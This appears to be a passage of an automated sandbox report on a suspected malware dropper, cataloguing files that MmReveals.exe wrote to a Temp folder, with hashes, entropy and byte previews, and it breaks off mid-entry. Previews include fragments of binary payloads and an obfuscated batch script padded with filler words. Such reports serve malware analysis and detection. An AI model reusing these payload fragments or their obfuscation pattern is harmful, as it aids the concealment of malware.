                        C:\Users\user\AppData\Local\Temp\Compete

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8192
                        Entropy (8bit):6.5483294401297645
                        Encrypted:false
                        SSDEEP:96:xuMgMAEpjysGMoV74ORLgEGZr+Kvd35u1G5qLHrqvcDwmXDDSr/l8OoAFsizZ2oz:xPAEByss7XLNUrnliH5QlEboAtyYba1
                        MD5:3DFA6BF53AD5515FDA77AEEF0D76FE4D
                        SHA1:4B101F073DC15E4E0B245D761B7B9E031C8E75B4
                        SHA-256:C164721BF7A110FC79554B7D55DA8B824F09708682008E7B1B965A1ADD35BA86
                        SHA-512:218B484875A3245BC8B16DBA238DD2E477514B56AC1861BB1E477944570DE06DBCE6DA778D0C6B775CF7C6FD22E4CAAC4BE3FA22106E748293C248867B72E014
                        Malicious:false
                        Preview:....}...E.....pu5.M...]...f..f;..E.u........M..E.u.3...f..f;......@...u.S.u.SP.K....U...u.B.U.;.t +...N;u...;.}..}..t......E..@........F._^[..]...U....SV..W3.9~.tV.~..tP.M..AS...u....u..l......~5.M........~..E..PW..q...M..E.P.nS..G;.|.M..#......3._^[..]...V..N...t0.~..t*.v$.V..v .v4j..v..6.6.......F(..~..f(...^.2.^.U...,SV..M.W.t....u..M..s..~..}......E...y:h....j.WP.u....6.#.......y...3.....V3..M.WS.....E...E...3....E...j.V.u..u.j..u..0.......;s.t?.M.+.PQS.M..E....E.P.M......u..M......u.G.E...t.;.u..C.+.PV...E.+.VPS.M.......E.P.M..x.....t..E..P.U!...M..7"...M../"...._^[..]...U....SVW.M..d....u..}....E..X...;_.......3..E.8E.t.S.......f.8{u..C..E......3..E..M.......6.6..........P.B..Y..t&..Q.E...A.........M....P.......;G.|..u..;...}....Yt..}..t!..;G.t.P......f.8}u......E.......M..K!.._^..[..]...U..V...P...E..t.V.....Y..^]...U..W......tV.G.V.0.1...u..p..1..3.j.Z............Q.H....O....1V.A3...u.V..3...G..0.....G... .0^_]...U..SV.u.Wj.hH6I.V....=.......u....3.@_^[

                        C:\Users\user\AppData\Local\Temp\Compile

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13312
                        Entropy (8bit):6.5759444698507625
                        Encrypted:false
                        SSDEEP:384:qqKWeMdoWDpWpbdIoQYfkbrOzCeTmCBo0v:jeINDpWPIDJ0vv
                        MD5:E769F265D7749DDEA00C3DF2FD1B8056
                        SHA1:316E8C459279E0F4178EEA894815B9043C6BD9B9
                        SHA-256:EF40A243A2355A6C71A25BC3B396D86757E90F8F8A6656D568AFEF75B29A7A41
                        SHA-512:16B2AA1E5263109E45593B03FCF449CB2F0053B97E4607FC9FDFE3294497873939FAC0BBF2E2D925D135E378ED57E991E3D8A7A828FD7776716B6DE7F4B5443E
                        Malicious:false
                        Preview:.......uD........ty.H...t..~<.ul.x..uf..t...j.Q.P..N..F.P.v...j..v(j.j.Q.R,.?.H...t8.x..u*.e...U...Rh.<I.Q...M...t...Q.P..E.P...Q.....j.Q.P.^]...U..E.=;...u..E j.Yf..3.Af.H.3..9=+...u..E j.Yf...@.......=....u..E j.Yf..3...=....t......].$.U..SV.u.Wj.[Sh.<I.V...P.......u..O(.E...3.....Sh.<I.V.}P.......u..O0..Sh.<I.V.eP.......t.Sh.<I.V.RP.......u....H..Sh.<I.V.8P.......t.Sh,<I.V.%P.......u..O4.Sh,=I.V..P.......u..O,.i...Sh.;I.V..O.........O.......t..u.V.........@.._^[]...U..SV.u.Wj.[Sh.;I.V...O.......u....E...3..`Sh.<I.V.O.......t.Sh.;I.V..O.......u..O...Sh\<I.V.gO.......u..O..Sh.<I.V.OO.......u..O...@.._^[]...U..V.u..N..Q.........A.................F..H..F.........H................U...F.Rh.<I..H..F..@.P......x2.F..H... Pj.Q...RH.M..F....P.u...Q.R..E.P...Q.3........^]...U..E..@.....t.j.j..p...X.I.3.]...U..E..@.....t.j.j..p...X.I.]...U...u..u..u..u...@.I.]...U...u..M..u..I..k...]...U...u..M..u..I..B...]...U...u..M..u..I..;...]...U..V.u.W.}...t...V.P....G..H...t...Q.P..G._.p.3.

                        C:\Users\user\AppData\Local\Temp\Concentration

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):6144
                        Entropy (8bit):7.939485352823763
                        Encrypted:false
                        SSDEEP:96:OeNvLIDiOzXKAGFkXPgZqF3HwV58LNzFN/B7jJjmekHUE4pgr5WGe3:OeB6rRGFkP3I+BnvJ6eXbGe3
                        MD5:815798C438E7114C729702E6615DEB2F
                        SHA1:C409F3CF1D68E1B15A4CAAC5BDDB3917042E1E13
                        SHA-256:0497B121DEFB623951C64AAE2F8163455EB156A8D697F0E274FCB41DC71E3A00
                        SHA-512:2F20ED92C61392C913D099265983FD1C57F425C1865AE8F0E72DF691561A2857AF12539E43241B3022A9539934C48A19FA8F67FEB844D23B5E82089B7E19D3FE
                        Malicious:false
                        Preview:.8}..O.`]....M.&@.1.z@..'p..;.'....$.Q....".o.t.Bv.9..D...0...g`,..n`..P....'P...Z.;}...j.K..$..u.IQ.....;e.07A...v.-....:............K/....1.j....E.S.o.w....,B.Z.....c..x..r.........={......V....B.@GU.X......>.qc.^..|...=.{...FGG..m......DQu....X..J.....=..8...;.....z..T...].. -.Z.U...<.d......Q...wb..A>...K{@....+..(.m...&......c*.w..CTc.&..E............9.h_.[.+f.a.Z.8.o%h...Lte..&.7.|..u$>."..!.:z........_..C.p..U\.paM._d.E=.~wR...3.......]....7..K.;|.........G....fV..{..(......nh.(...6n.m.ye||..K/.td..[FGG.{.f.@....N.Dq..ZYY.....h4000.G.}.w...._.....".....V.......8H.jE&s..P..$...AbK....j{.h2F..Tj.?.>ZY...T.m.;.=..Rt.`g...;4...8.X..JZ/Q.b.1.",r..dA...V...fZ./...T...PZ.C..xT*...@..l^_....cx.....=.?.+W..T.2._f..2....:..(..4Mq..%...].v~.....g.y...[H..}.I..x..0...5X.F.w8.i.,......+W...g...x.{p-U.h'.....:/V+.4...<......w..=q.....r.%4[-q....T#..H........"q...)..E..@."..V>.h7...`..0.`h...0}?....M'...$.U." WE.*...........9.....Z..).M.DR.....

                        C:\Users\user\AppData\Local\Temp\Correctly

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10240
                        Entropy (8bit):6.541078079670849
                        Encrypted:false
                        SSDEEP:192:Effs/ecsUAo/HaHbx91Q7ridl8Uvh306IEZ/F6Q+2aM2o:YfKesAGa7Hl8Uvhk8F6Q+ldo
                        MD5:1465936467E006225FD6AC4AF0786FB9
                        SHA1:7DD7AD433B92F0B6F4D33AAC37362315B77CD5BE
                        SHA-256:3E26CB1284308905B98BF70844571FA78AD7F93F0F181AB75EEBEA22DD0AE7BA
                        SHA-512:364C92BBC1F400EDAF03DFA42073FD57B8DEA27CE5F48C22D72593F7310E7F3E4F299C2173B417AA28A4AEE29C5927EF9313011EC13F57EF59FD200531973EB3
                        Malicious:false
                        Preview:QSW.}....u..{.........e...e..V....I..}..........j...4.I.P..`.I.j.PV...L...d.I..E...t8.E.PW..`.I.....L....L.;.t.j.PQ..d.I..E....L.j.PV..d.I....E..}..uV.}..uP..uL...L.;.uC;...L.u;.c ..5...=d.I.t j..5..L.V....L.....L.;.t.j.QP....L.j.PV..^_[..]...U.....A..t7.E.3.e..A.e.....f.E.E....f.E.E..E.E.j.PQ.M.....I...j..u..u..u.....I...]...U..V..3..F..F..E.......f.F.f..u.2..EP....I....f...t.S...j....P.......I..F....t..F.....t..F.....[t..F....^]...U..V..3.3.F..E..N..N..N...<.u.2...Q...P....I..F...^]...U..E.P.u..u...$.....].U..QVW..3..G..8.t.F......|...u.3..7.E.P.u...`.I..u.j.h8.......I.j.h.....u....j.P....I..D.._^..]...U..VW..3..M..G.9.t.F......|.."h....j..t...4.....I..4...X.I..d..._^]...U..V.u..Q.3.92t.@......|...t.j..u..u.V.4.....I.^]...U..V.u..Q.3.92t.@......|...t.j..u..u.V.4.....I.^]...U..S.].V..W..l.I..C..F...tWj.Z;.r...V.3..j.Z.........Q.}...3..F.Y9~.v2j..k.....Y..t..K..........3.F....G;~.r....f...f.._..^[]...U..U.V.....>J..B..F..B..N..F..B..F..B..F..B..F...=....u.V...........

                        C:\Users\user\AppData\Local\Temp\Ever

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):27648
                        Entropy (8bit):6.644465569593187
                        Encrypted:false
                        SSDEEP:768:RzJsDXtiC84Ll9iRfdB1gpjXgckS9cAXKOd+3F:RzJW784Lle+1X/tcATs3F
                        MD5:01267CCB3155A2EEF1EDF24558E912B4
                        SHA1:3B5747832EE31B9E9095B1D8375A056D6428389D
                        SHA-256:2B714805547AECEB1B970147E8E5EF58376F544158595F90F35B082A5039973B
                        SHA-512:55D95C3CD927FE55CBF9AC4643DA71D3F83D28F35C11211C39D78A2A886D7D6AFCFEA5F8A5C4E0BC659D30E83F4E10B5C2D994608DE6D7E9EBADFC98A5075997
                        Malicious:false
                        Preview:.P.D$.Pj..L$D.........L$8.\....D$(P.L$..x...j..t$..L$ ......u..D$P....t..D$P;.u..L$.......L$(......L$.......>...Q...W..X.I._^..[..].U...<SVW3......VPj.Vj...PQ.3....I...U....u.2..Ij.Y3..u.V.}.u..E..u.Pj(.E.u.Pj..E.Ph..-.R..P.I..u.....X.I...t..E....._^[..].U..(tL.....x%.u...@...tSV3......VPj.Vj.PQ....I.....tDW3..E......}.u..V.u..u....E.Pj..E.Pj..E.Ph..-.S..P.I.S....X.I._..u...@....3.8E....^[..].U...4...SVW3.Vh....j.[SVSh....Q....I......u...@...|h(.........VP.(............................u.j(Yj.XVf.......E.PR......f......PRPh,...W........P.I.W....X.I...t.3.f.}....._^[..].V..F.HP.s...f.8\t.hL,I....X...^.U.....E.V.u...K.VP.7....u..E.VP.*....E.P.E.P...... ..t.3.@.....u.j..u.V..0.I...t.PV..4.I...t.SWP..8.I..e..3.E.f;H.s}.x...G.j.PV..0.I..........SV..4.I..E...t|SV..<.I..u..E...8.I.......uL..E.;.u...O....uL.;.u...G.;..uL.t .E.....M.A.M...@.;.r.3._[^..]...j.RSh....j..u..u.....I...uL...3.@..U......SVW...hX.K..........u..M.V.....|....M.......M........|.........M.......M..

                        C:\Users\user\AppData\Local\Temp\Fellowship

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):47104
                        Entropy (8bit):6.535870496996456
                        Encrypted:false
                        SSDEEP:768:ssu1izubGntN6IZOjAV0SMg4XJ80RGrkx3zN3AFR97T98+sDkXLAlf:sl2ub2tBOjAeKmCFYNB3OFTR7bAlf
                        MD5:4165E5E1422A6A39D353CEFDD571C734
                        SHA1:B5AFDC5CB65F92E35DBC89F42F8E6E323F1AFB18
                        SHA-256:9E4E5030BD410099D96B5990B4B7FE00B82EC8A6A160CE14BFD0B06C4AD0D494
                        SHA-512:8703DAFF4B5310A5F22D7D660872958D808B23FBB9C6CDFA1F46A556AB6799ED61D9A524155515674551DBB9619F0CC41AEEDDD89191C79E01DEB4ADE8C508C7
                        Malicious:false
                        Preview:;........~.........N..........F......S.........B...........$.0.@..E......u.f.90tCQ.Y....].....U......B....we.$.X.@..E......u.f.90t'Q.&..............Q...x..c.....Xu..Y.....Q...x........Xu.....]..b....[..~...3..w...3......u.jz.....u.......[.@.h.D.}.@...@...@.[.@...@...@.{.D...D...@...D...@...@...@...@...@...D...@...D.U.....e...E.e..V....E.....VP.u..u........x..M..t......E....3....M........^..]...U..E.....F....}..u..}..u4.}..u7.}..u=.}..uC.} .uI.}$.......3.]. .j.h........j.jw....j.h........j.h........j.h........j.js...U....SVW.}...M.3.j.C.....A....Zf9P.........pbL...D........._^[..]...U....SVW...........7....]..U.j......B....Yf9H.tS.e...E..e....j.PSR.E............xK...p....~..uH.N..E.P.4....~...F.u;.M..@.......U....B.j....Yf9H.u _^[..]....M..~.....F..H8.@8....@...Pjr...U...0.E.SV.u.3.W.M..]....x.....]..E.......1......E.}.;W........E.N....E.O............E..E.;E........O......I.f;M.M.M.../...;E..._....w.....u...@..E..E.f9E...)...j..E.PVW.............}...M.].

                        C:\Users\user\AppData\Local\Temp\Founder

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):41984
                        Entropy (8bit):6.487364785579847
                        Encrypted:false
                        SSDEEP:768:qoDCHT5xv8xV9J7J6Ax6zNGB0toYyncyH9JRpHbDYA22HbbjNbkBYYTrI3:JC7v8xV96AE11yHxpfYAz7FbkdHI3
                        MD5:D7355E9B85613F6E502632DAC93C9552
                        SHA1:8C87ED802BA382D90D4732128BA85689FF63625B
                        SHA-256:B895AE581AB3CD38897C5144C17D519F5ECCE9D40B2BB0EB3D45E604E96A1A17
                        SHA-512:38B812ED646EEB028C434CF43F2CBF373C4700CE6548DED490A8B75BB03E0B54D031F3C0C42415D71B652057668AC153EDDA9F77AF0116D412C72046F66C15AA
                        Malicious:false
                        Preview:.b...t$..5..I...|$..t..t$...L$H.T....L$(.K....L$8.B..._^3.[..]...U......T.d$..SV..L$<W.\$..h....L$0._....L$P.V....}..G..D$ ...t...........G..0...b@...N..........A..B..A..B..A..B....D$`P.D$DP.D$XP......D$0.......D$D.A..D$H.A..D$L.A....D$,P.D$,P.......u)..j.j..H.....a...u....h@...&..F..........|$D.tT.D$.P.t$..t$H..$.I...t73.WP...H....D.....Wj..H....ta...u.....@...F......>.-....L$....L$..D$,3.P.D$.P.D$$V.....PVh..I.V.t$lQ..`.I...tIVP...H..........3.VGW.H.....a...u....?...&..|$...~........t$.....I......|$ ........G..p.....>...F.h.K..0..!..Y...G.Yu..p.....>...F..0.....Y..E.....G..p....>...F..8.E..@..p....>...F.SWj.3.S.0.t$ ....I..........T$.SP...H.........u.....>..........p....B>...F.h..K..0.[!..Y...G.Y.......p.....>...F..0.7...Y..E.....G..p.....=...F..8.E..@..p.....=...F.SW3.3.GWS.0.t$ ....I.....a....T$.SP...H....X....u....5>...~....;....p....=...F.h..K..0. ..Y...G.Y.......p....r=...F.3.j.Z.@..D$.....D$ .........Q.,...Y.O..D$..q....;=...V..L$..t$.AQ.....$L...D$.Y3..F..t.f.<N

                        C:\Users\user\AppData\Local\Temp\Glasses

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):52224
                        Entropy (8bit):3.7344593475657724
                        Encrypted:false
                        SSDEEP:768:lq9BxyyM0Dj2Bmgari0UPD/3Efrafd0maNBZikE:lq9Bxhgari/D/3EfraF0HikE
                        MD5:2DB28D8DAE81D58781C54234889596F4
                        SHA1:AC258FA1A10E0CFA7FC1966C9AB747AF10910F91
                        SHA-256:E5EC151ED3884450B594DB14292879D070D1533B8464269347DAE4010FECC7DF
                        SHA-512:6C02CEAB55A1FDF75D5EC2BF80D8CB454AAE4F75825AFA5C572A5E113EA4558FB31CE53C342C54EDBE7B8AC8DC49A03AA449CE88543D6B38F7F87D12183B3C6D
                        Malicious:false
                        Preview:T.T.A.B.............S.H.O.W.D.R.O.P.D.O.W.N.........H.I.D.E.D.R.O.P.D.O.W.N.........A.D.D.S.T.R.I.N.G...............D.E.L.S.T.R.I.N.G...............F.I.N.D.S.T.R.I.N.G.............S.E.T.C.U.R.R.E.N.T.S.E.L.E.C.T.I.O.N...........G.E.T.C.U.R.R.E.N.T.S.E.L.E.C.T.I.O.N...........S.E.L.E.C.T.S.T.R.I.N.G.........I.S.C.H.E.C.K.E.D...C.H.E.C.K...U.N.C.H.E.C.K...G.E.T.S.E.L.E.C.T.E.D...........G.E.T.L.I.N.E.C.O.U.N.T.........G.E.T.C.U.R.R.E.N.T.L.I.N.E.....G.E.T.C.U.R.R.E.N.T.C.O.L.......E.D.I.T.P.A.S.T.E...............G.E.T.L.I.N.E...S.E.N.D.C.O.M.M.A.N.D.I.D.......G.E.T.I.T.E.M.C.O.U.N.T.........G.E.T.S.U.B.I.T.E.M.C.O.U.N.T...G.E.T.T.E.X.T...G.E.T.S.E.L.E.C.T.E.D.C.O.U.N.T.................I.S.S.E.L.E.C.T.E.D.............S.E.L.E.C.T.A.L.L...............S.E.L.E.C.T.C.L.E.A.R...........S.E.L.E.C.T.I.N.V.E.R.T.........D.E.S.E.L.E.C.T.................F.I.N.D.I.T.E.M.................V.I.E.W.C.H.A.N.G.E.............G.E.T.T.O.T.A.L.C.O.U.N.T.......C.O.L.L.A.P.S.E.....E.X.P.A.N.D.....m.s.c.t.l.s._.s.

                        C:\Users\user\AppData\Local\Temp\Humor

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:ASCII text, with very long lines (408), with CRLF line terminators
                        Category:dropped
                        Size (bytes):7988
                        Entropy (8bit):5.05530450415697
                        Encrypted:false
                        SSDEEP:192:5+H8E74QpXW25+VLVJqam2fSz4WtJZJFCIMXVTeXE3WKyK:5J0s2spyamcSkWtrCBp3WKyK
                        MD5:8B46EC4185CBD19EF8AF364753B6D10D
                        SHA1:B8406FED6DFA3B76E60E552F77A26A41985DCD4B
                        SHA-256:E77DD54FFDE60F92A29C02402771E9EF577F71A03B351A4A6FCAB2F16EA84D71
                        SHA-512:7646F6F9804DA67AFE0086F6871B8E31BAE646E1ABB2BAF6D2CD8D8752494658280D2E736D9204867A0A2DE14D1E87394FBFC6C5A3B8A5A74D196D1C2B39156B
                        Malicious:false
                        Preview:Set Cleared=d..MLVqInvasion Hard West Contracts Trick Debate ..yEiEnabled Sandra Cunt Dr Gm Scheduling Hungarian Aim Governing ..tvTYColorado Health Stronger Requiring Mattress Grande Pakistan Valued Paris ..lLTsDriver Nicaragua Transportation Commentary Penis ..XCVisa Edt Tft Offline Owner ..YykAssault Wind Difference Sometimes Nintendo Multimedia Phones Spare Move ..lrDTitle Qualities Jefferson Listening Process Exhibitions Purse ..TcDisc Laser Af Etc Dial Rep Bi Kick ..gAwONebraska Writes Horny ..Set Former=E..ULPuts Transparency ..bxVjBound Stanford Andrews Fewer Beautiful Parks Liverpool Extent ..yDHcPrimarily Provides Contrast Boat ..gTChubby Thu Mainstream Employ Entity Grass Fighter Enable Preservation ..JbxRecovery Welfare ..aVwChapter Evident ..PdContributing Deployment Encouraging ..XXkCarriers Sg Schema Fatal Calculator Woman Lighting ..ZYXLights ..kEZzRecommendation Activation Ms Internship Lbs Yang Clinton Catalog ..Set Arrangements=6..LAKill Neighborhood ..LqAppointment

                        C:\Users\user\AppData\Local\Temp\Humor.cmd

                        Download File
                        Process:C:\Windows\SysWOW64\cmd.exe
                        File Type:ASCII text, with very long lines (408), with CRLF line terminators
                        Category:dropped
                        Size (bytes):7988
                        Entropy (8bit):5.05530450415697
                        Encrypted:false
                        SSDEEP:192:5+H8E74QpXW25+VLVJqam2fSz4WtJZJFCIMXVTeXE3WKyK:5J0s2spyamcSkWtrCBp3WKyK
                        MD5:8B46EC4185CBD19EF8AF364753B6D10D
                        SHA1:B8406FED6DFA3B76E60E552F77A26A41985DCD4B
                        SHA-256:E77DD54FFDE60F92A29C02402771E9EF577F71A03B351A4A6FCAB2F16EA84D71
                        SHA-512:7646F6F9804DA67AFE0086F6871B8E31BAE646E1ABB2BAF6D2CD8D8752494658280D2E736D9204867A0A2DE14D1E87394FBFC6C5A3B8A5A74D196D1C2B39156B
                        Malicious:false
                        Preview:Set Cleared=d..MLVqInvasion Hard West Contracts Trick Debate ..yEiEnabled Sandra Cunt Dr Gm Scheduling Hungarian Aim Governing ..tvTYColorado Health Stronger Requiring Mattress Grande Pakistan Valued Paris ..lLTsDriver Nicaragua Transportation Commentary Penis ..XCVisa Edt Tft Offline Owner ..YykAssault Wind Difference Sometimes Nintendo Multimedia Phones Spare Move ..lrDTitle Qualities Jefferson Listening Process Exhibitions Purse ..TcDisc Laser Af Etc Dial Rep Bi Kick ..gAwONebraska Writes Horny ..Set Former=E..ULPuts Transparency ..bxVjBound Stanford Andrews Fewer Beautiful Parks Liverpool Extent ..yDHcPrimarily Provides Contrast Boat ..gTChubby Thu Mainstream Employ Entity Grass Fighter Enable Preservation ..JbxRecovery Welfare ..aVwChapter Evident ..PdContributing Deployment Encouraging ..XXkCarriers Sg Schema Fatal Calculator Woman Lighting ..ZYXLights ..kEZzRecommendation Activation Ms Internship Lbs Yang Clinton Catalog ..Set Arrangements=6..LAKill Neighborhood ..LqAppointment

                        C:\Users\user\AppData\Local\Temp\Hz

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):44032
                        Entropy (8bit):7.8507813814985985
                        Encrypted:false
                        SSDEEP:768:g0kkuhsRqI5o+oyyxVxCaw2F8aP6VOHQznzp8G7bJu1UY3dLi29NcNngX+F+2tz6:g06LDykFIcizp97bA3EKNcpzjIt
                        MD5:CB12A78DA9BDB4CE51D789154D460775
                        SHA1:9FA7C905A2CC725E92717EC6AFA50472C7FF1819
                        SHA-256:56A77E5EFD1777B97119D3EB1AA0991F2B7940260221E8CBC11B6D3D8E959BFB
                        SHA-512:7C48062F1A551B66FE6D08985AB0220A8F8491E29C0A784D273EBD248F808535BA25C936EC3CEBC18B3C501D7375A27A94177FBE72AC73379763B9F6B3EC9A88
                        Malicious:false
                        Preview:..p........Vz{............^..............{AL............Y{.............d..f.......X.....AO............f.......B...............Q.......Af..............~.......4n.............,.......C................X.............................B..............d....................EV.......Z...............[........VI........L.......U..................d.........O.................Z.................^.........................Y...............................c....d.......].....................p.............\.........^c......................p.....................`c........................p.j..................hp..........................ppi...............d.p............................npi...........oepp...............................fpppiopooiippm....................................fcdipmifcf....................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Intro

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):7.984960013127064
                        Encrypted:false
                        SSDEEP:384:4WdiBlONel2gNA5ysqre+kfYx161larmyF4cUF+JEdYAHLaJC51goV:4WdinOEgg+ys6kQ3+laXM77HLqnoV
                        MD5:CF5EBE3EA303D4329F2F8B9F1A746BC9
                        SHA1:2C9DE83E640FDC1813113EC9C2EFC9F2A7A6DF18
                        SHA-256:244D2BCCF0F0D141736B7E6F9119B9DA16452A4D57E7FD23DABFA97B37B8C2A2
                        SHA-512:D77470A64D7BD7B45A61D4A3F1FCC136B444BEEEDCC5408386F9F69AC82038607C5FCEEA0CD18418CD5C0FD362C10A9A69EFD87A24D5E08E9CC6BEEF45701D47
                        Malicious:false
                        Preview:...f.z....b.x....J....>Qu...N......6j.....1..!2.H .....#c.s.9.L-i.d.S..h.i5f..........+...X....ny.i...PH..9OB~.....;...K.... ..o..#..Q.=..O=..n..>..LZ.....y.^.v\....B..s......6.F..J.'N.......?0..).... /-.N....4.....U.5.L......42!a..6.%Mh..c....S97..3.]...W..x......htt...t.d..4.....1..|..D.Z.%K01>j.\w..h...H....}fv+.`.....#..2..4..0{...z.<^.hJ.k.N@..LB..o.~si...1J)...o..n...7.3...r#. ..3.L.h".{.g..W.7.]...r..f..^....{uc..s...|m..<;....}..$...$.v.`...(.03;...I.....u..N....y.X...Q1.|...}DN.K(.N..`.. ...a......K2.|.u{). .P...l6q.%..>00.......Q.E.:....#....b..x..0.[*..FGG.z.J(...n3......N.{-......O....1..]...'......-[.R.dc.>.$....W.8x.....0..6.."...].v....q...?..J.L....$.<...iu?>...X,.^..gI[..[...Z......N..u.7^.>`.=.~....E.wC.I...=."4..LNNbjj...z+.G~..=....1?...$.Z.......%m|.D...F....9...D..?m.d26..X,..n.j..........p.T.37`/.....x.Z.).....l.2.J.....K6@j.MR&.'y."......bYb.{w..?q%>..O.\.4...I.1M./D"....h.F..7.|..w......g^...!..........{.4,..

                        C:\Users\user\AppData\Local\Temp\Located

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):53248
                        Entropy (8bit):6.652892461856609
                        Encrypted:false
                        SSDEEP:768:6+ylIt0su0B4y+aZmzddtw1E1Yd5dArqsfGuYJhLgBF9OR7F8ufnz4kVDz:pylIusu0B4MmHtt1OPeRQnz4qDz
                        MD5:AFCDA50A83DF21E1BD26C94D76C62FE8
                        SHA1:197C1EC9CCCF431CDF4D32A52836F3E0376D7CB4
                        SHA-256:5B437896E2856B002151ED7987139A41AA5FAF61C106D4084EA99D9C990BF83F
                        SHA-512:98820F90FEA6C0D6B0CA7FB24C91A24ABDB222043F4C7E624824D384CAC0EDF6DF37C77C2058F581D3AD29313A9615F0B42C7B8F5BA65C4D4FA282A0CFFF4937
                        Malicious:false
                        Preview:...+..rc..U..SV...W.}.j...........3..G..A.Zf..@.........;.~^........... ..qd..........B...f..p..9d...V .........w......A..$...A..G...........+....O._^[]....d..............~E.........j.Z;...vc.....~,.................t...%....=......rd...O..O......v...j!...X+...j)Xf..'t\f..(tVf;.tQf..-tKf..#tJf..$tDf;.t?f..+t93.@.G....!tM...tA..;t1..Ht!j.Z..Uu.....................3..... ....b.........b..j.Z...........b..3..........A...A..\E.............U....SV...E.}...W3..E.....0.........J.f;.t|...f;.ttf;.to.J.f;.tg3..@.3..CB.............1.,..0}N...u..}....qc..3._^[..]...t1.."~..5c....6t...8t...}..gc..=....~..Fc..3.@....}..t.....yc..3.F."c..U..QSVW.}...M....3....@dJ...A.6........=......gc..=..........=..........=..........=..........=....th=....ta=....tZ=....tS..}te=....t==....t6..U..^c....V..Uc....^..Lc........c.......|c..3._^[..].E.@P.Uc....N.3.B.. ..>c.....7c...u..6c..f..aw.jUXf;...Yc.......U...(SVW..}.j.Y..XJ....U..H..E.f..u...x............f.DE.f..KIy.E.3..._^f..C[u.....].2...

                        C:\Users\user\AppData\Local\Temp\Lt

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):164864
                        Entropy (8bit):7.998940246424731
                        Encrypted:true
                        SSDEEP:3072:PuCXNQFfAmB7JT2hFyXIi4ysn+y0Izo1VmLxAa7e1QVVZA/1D7uu:PHCFfAFqXYJsA48LxAI5YIu
                        MD5:9A38088063BEFBFE5BC42CE1EFEE415C
                        SHA1:BA053ED65728229E97440E32F35E135112727109
                        SHA-256:A41DA2AD3185828A33445F225D53F194E4A1B04272492C53BD99278FE7B37AF8
                        SHA-512:FC3E9715286F6EF95E33544C971DBF51B0CC5CA293E3CB348B7A2245D52D6B7407FF3DDA31C43A61AE6C99E1F9A891680431D76DBBFE097B7F2D5B1D9C3C1664
                        Malicious:false
                        Preview:.2.....u....K.wET."v._.3.P.;.4VFv....Q...q.......P.S.AfK.TKkX......j%.E.k..d&.3..)o...5...A....R...H{..o.F.x.[s..Kt.Q+'....}>.....G.. H...RM...B..Egs._......0#...2..,....@.....D.OGP0.T..B...../.pB./2.e.......J.b..=...~....4.`....).}...%6......h.S..]....j.0...!..S+RP...1$.R.aU..6`d.*Y%Yx.....;..(.?. ..a...[.N...C....*e/9.SP-...-k.?v....+...".....&5.9.BR.t......L...9A.:...1a,....6.^M...C..v..G..*.{.....(\!.G.......3.....!........C._n.g...).{Y,6.L!g.k...C.P8...h<..n.;{.. 0.._...M.+..a._<.....%...j...U#mo..;..E..N..p..f..rrc........Z.+....,$#%h...B.PR..S..c..(!.]....:~.L.vs......4..HW.S.'.(*?..N7\a.O.....:w.....9[...._".....{...8...sP.I.1..2..".2.<.js..U.....}..hB.&tT.'.Y/.lu.U.#i>...PE`iS................{,.LaZ...]$L...%...<...N..S.#."...=_.sZ$..?.6.+.!WEv.S....-.l..M/.=p.Jf+...Z.'...;.;.e....%[....\}.....J...kv.....7.1.....o...e.q..1y2.].|-.L,...d7._.h..c.EoC0.f..B\.}ix2_w.?l.!~.*..D.3.c.xx.L62.(b.0...-X."...$.N.i..J.l}h..D.*`....C...

                        C:\Users\user\AppData\Local\Temp\Miniature

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):39668
                        Entropy (8bit):6.982356594854894
                        Encrypted:false
                        SSDEEP:768:hrUCVoyOQ5DuOKHnPiamE9w97OUg4eVDqp8VQ7A:hrnVRCOa69E9wFOUg/Rqp8b
                        MD5:9B2CC3CFE829D7EC1D60A4BC50FD9097
                        SHA1:8E346E7C6ABE42A06754F89A626A591E2C623AAB
                        SHA-256:D615C12587DC55349F2403072D3040CCB14AF82B4CB1721B989F7FF65C9292EB
                        SHA-512:8324797008DF611DC95BCFAAF72714AC438D8B31ED550DCD910958A6B4F064D78B8B97D5E1668C249762CECA0C9B585BF9A18E83E340EB29A786D0151A116A57
                        Malicious:false
                        Preview:.......................................................?....................................................................................................................(....... ..... .....@...................................S6 ecA%.sM).~X/.~V..sN).dA%.T7!i............................I...T...zN$..d1..r9..q8..`..sI".P+..I-......................@)..T1..pA...Z+..}G...^...^..|G..V*.f<..K,..@'..............A+..M/..kB...U)..k;...Z...q...q...[..l;..S'.a;..C)..@+......M5!L............2!..A-......................................M6!S2"..111.........sss.'''.................................---./...L1......sss.........MMM.bbb.........................yyy.#...D-..T5..kD#.!...............""".........>>>.................X7..G-..]< ..[0.fD(..................... ............... .^?&.zM).P3..eE+..c8..zS.K9+.OON.........kkk.ihh.........\\\.J9+..wP.~T0.X=%.lQ:.jD...c...z.J?5.........................8/(...w...^.{W9.fK5.zbPP.aA...n......}..........................~n......b.oQ7.waNW....z_I..g.......

                        C:\Users\user\AppData\Local\Temp\Nd

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
